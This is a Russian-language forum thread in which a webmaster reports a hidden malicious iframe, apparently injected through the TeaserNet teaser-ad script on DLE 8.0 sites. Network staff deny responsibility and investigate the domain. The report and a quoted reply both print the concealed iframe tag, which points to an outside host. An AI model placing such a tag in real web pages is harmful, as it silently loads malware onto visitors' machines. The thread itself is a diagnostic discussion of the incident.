TeaserNet.com Beta 2.0 тема-3

BP
На сайте с 12.05.2010
Offline
3
#891

добавил сайт(рекламодатель), часов в 12 ночи, одобрили в течении 5-7мин, что действительно радует и за что большой + :)

[Удален]
#892

Teasernet support, на сайтах с Вашими блоками под управлением DLE 8.0 (на 8.2 и других не замечено) начал вылазить вредоносный код (Каспер матерится благим матом):

<iframe src='http://osen2010g.ru/zl/s14' style='display:none;'></iframe>

это не есть гуд... (походу, лезет через document.write яваскрипта).

P7
На сайте с 19.08.2010
Offline
8
#893

надо будет и у себя глянуть

CONVEER.COM ИНВАЙТЫ (http://www.liveinternet.ru/users/conveer/post130791654/) Дейтинг на подписках и многое другое Все $$$$$ здесь!
Teasernet support
На сайте с 25.06.2009
Offline
209
#894
alesty:
Teasernet support, на сайтах с Вашими блоками под управлением DLE 8.0 (на 8.2 и других не замечено) начал вылазить вредоносный код (Каспер матерится благим матом):
<iframe src='http://osen2010g.ru/zl/s14' style='display:none;'></iframe>


это не есть гуд... (походу, лезет через document.write яваскрипта).

alesty, никакого отношения к данному коду TeaserNet не имеет.

Наиболее вероятно, что Ваш сайт хакнули.

Можно на сам сайт посмотреть? Будем рады помочь найти причину.

добавил сайт(рекламодатель), часов в 12 ночи, одобрили в течении 5-7мин, что действительно радует и за что большой +

Спасибо, рады стараться :)

TeaserNet (https://teasernet.com/) — большие объёмы качественного трафика. Мультиформатность, поддержка 24/7. Поддержка: ICQ 110000000; Telegram @TeaserNetBot: e-mail supp@teasernet.com
beroot
На сайте с 08.06.2004
Offline
124
#895
это не есть гуд... (походу, лезет через document.write яваскрипта).

Ищите проблему на вашем сайте.

Тизернет никогда не распространял ничего подобного и планов таких нет.

[Удален]
#896

Teasernet support, поверьте мне, как только код убрал с сайтов (ночью, незадолго до того как сюда запостил) - этого тоже не стало. выводы сделал. сейчас доказывать что-либо вряд ли получится.

облазил сайты на предмет взлома - код сайтов был нетронут. бд тоже не изменялась. вышеуказанный код вписывался при загрузке вашего блока на юзерской стороне.

[Удален]
#897
alesty:
Teasernet support, поверьте мне, как только код убрал с сайтов (ночью, незадолго до того как сюда запостил) - этого тоже не стало. выводы сделал. сейчас доказывать что-либо вряд ли получится.

все оперативно налаженно, это хорошо! 😂

AT
На сайте с 23.07.2009
Offline
28
#898

alesty, benzin, я понимаю, что у вас, наверное, нет повода нам верить, но действительно это не наш фрейм.

Попробуйте посмотреть firebug'ом или попросить любого не связанного с нами человека посмотреть.

Или скиньте мне в личку - с удовольствием посмотрю любое место, где вылазит эта осень. С удовольствием скажу кто и где именно ее пишет.

С уважением, Александр TeaserNet Beta 2.0 (http://teasernet.com). Наш форум поддержки - будем рады ответить на все Ваши вопросы (http://forum.teasernet.com).
[Удален]
#899

Alex Teasernet, я сделал пару звонков своим клиентам - они ранее жаловались, что Я.Вм "находил" вирус на их сайтах. Когда я занимался анализом их сайтов - то ничего потустороннего не находилось. Сейчас подтвердилось, что там стояла DLE8.0.

Сегодня я сам натолкнулся на эти грабли с "осенью" - проанализировал сайты (код, дату изменения, лишняк, бд) и ничего левого не нашел.

Однако, сегодня в 1:00-2:00 утра эта хрень все равно вылазила.

Залез в админку ДЛЕ, в раздел "управление рекламой" - и там вылез этот ифрейм. В других разделах админки не вылазило. Т.е., вылазило в коде той страницы, где был ваш блок.

Самое примечательное: в исходном коде страницы его не было, а при просмотре DOM-модели страницы он обнаруживался. Т.е., вывод сам по себе напросился: ифрейм подгружается сторонней явой (т.к. свою 10 раз проверил). Единственной сторонней явой, которая меняет DOM-модель была ваша. Как только убрал ваши блоки - всё нормализовалось.

Для себя выводы сделал, а вам бы посоветовал либо поискать того, кто вас регулярно подламывает, либо искать крота.

Успехов!

AT
На сайте с 23.07.2009
Offline
28
#900

alesty, я понял вашу идею - попробую ночью заметить что-либо подобное.

Для интереса посмотрел хуиз этого домена, нашелся еще один домен (по емейлу) того же владельца: 4mokipoki.ru

Вот что про него пишет гугл.. То есть это какой-то юный хакер, который сломал несколько сайтов. Если бы трояны были от нас то орал бы весь интернет)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий